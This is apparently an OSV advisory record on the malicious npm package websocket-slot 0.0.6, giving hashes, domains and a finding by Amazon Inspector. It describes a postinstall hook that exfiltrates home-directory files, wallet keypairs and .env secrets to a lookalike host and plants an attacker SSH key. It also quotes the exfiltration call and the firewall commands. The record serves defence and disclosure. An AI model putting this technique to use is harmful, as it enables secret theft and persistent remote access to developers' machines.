{
  "id": "MAL-2026-5530",
  "summary": "Malicious code in websocket-slot (npm)",
  "details": "\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (c15c40b8371646f167ffa7d5a2ba2c8d0fd454ef7054eeb41807a1a3eda8e7a6)\nOn `npm install`, this package runs `node test.js` via `scripts.postinstall`, which executes the logic in `index.js`. The postinstall behavior performs three distinct installer-side attacks: (1) it recursively walks the installer's home directory (and on Windows, non-C: drives plus C:\\Users\\), matching files against a remotely-fetched pattern list, then POSTs each matched file plus username/platform metadata to `http://cloudflare-prevention.vercel.app/api/v1` via FormData (`batchUpload(found, \"http://cloudflare-prevention.vercel.app/api/v1\", success)`); (2) on Linux, `addSshKeyToUser` fetches an attacker-supplied SSH public key from `http://cloudflare-prevention.vercel.app/api/ssh-key` and appends it to `~/.ssh/authorized_keys` with mode 0600, then runs `sudo ufw enable` and `sudo ufw allow 22/tcp` to ensure inbound SSH is reachable, giving the operator persistent remote root-equivalent access to the host; (3) `from_str_1` recursively scans `process.cwd()` for `id.json` (Solana wallet keypair), `config.toml`/`Config.toml`, `env`, and `.env`, uploading each match to a sibling endpoint.\n\nScan patterns, block patterns, and the SSH key are all fetched over plain HTTP from `cloudflare-prevention.vercel.app`, a Vercel-hosted lookalike of a Cloudflare-branded service, meaning the operator can mutate which files are exfiltrated and which key is granted SSH access at any time.\n",
  "modified": "2026-06-10T19:31:29.207660838Z",
  "published": "2026-06-10T18:41:52Z",
  "database_specific": {
    "malicious-packages-origins": [
      {
        "sha256": "c15c40b8371646f167ffa7d5a2ba2c8d0fd454ef7054eeb41807a1a3eda8e7a6",
        "id": "IN-MAL-2026-005292",
        "import_time": "2026-06-10T19:23:48.620586854Z",
        "source": "amazon-inspector",
        "versions": ["0.0.6"],
        "modified_time": "2026-06-10T18:41:52Z"
      },
      {
        "id": "IN-MAL-2026-005293",
        "sha256": "dff2c6c0da62db10517f42af8f1e926122d31e7500e7bccbe2f41fb1fe905eb0",
        "import_time": "2026-06-10T19:23:48.691599234Z",
        "source": "amazon-inspector",
        "versions": ["0.0.6"],
        "modified_time": "2026-06-10T18:41:53Z"
      }
    ]
  },
  "references": [
    {"type": "PACKAGE", "url": "https://www.npmjs.com/package/websocket-slot/v/0.0.6"}
  ],
  "affected": [
    {
      "package": {"name": "websocket-slot", "ecosystem": "npm", "purl": "pkg:npm/websocket-slot"},
      "versions": ["0.0.6"],
      "database_specific": {
        "source": "https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/websocket-slot/MAL-2026-5530.json",
        "indicators": {
          "domains": ["cloudflare-prevention.vercel.app"],
          "package_integrity": [
            {
              "hashes": {
                "sha512_sri": "sha512-6XJ00jmf84Iec/zg+VkO7qbCCa4WL+FCoWuukGLsulodAcTAjWDbYmhBb+gByuuZAdy30GlGhAZnj4WsZK9D7g==",
                "sha1": "c9d325aaccf45f3a2478b1c95fddac36681e7af7"
              },
              "filename": "websocket-slot-0.0.6.tgz"
            }
          ],
          "evidence_files": [
            {
              "sha256": "79aa5a78c3be61c42af94f1d4cff38f4752c458546d1033560f5f4008ef6b127",
              "path": "index.js",
              "tlsh": "26f186d891772661cf7233b85a13110dfbdac13339028651b6dc86497f7b52861e2eed"
            }
          ]
        },
        "cwes": [
          {"description": "The product contains code that appears to be malicious in nature.", "name": "Embedded Malicious Code", "cweId": "CWE-506"}
        ]
      }
    }
  ],
  "schema_version": "1.7.5",
  "credits": [
    {"name": "Amazon Inspector", "contact": ["inspector-research@amazon.com"], "type": "FINDER"}
  ]
}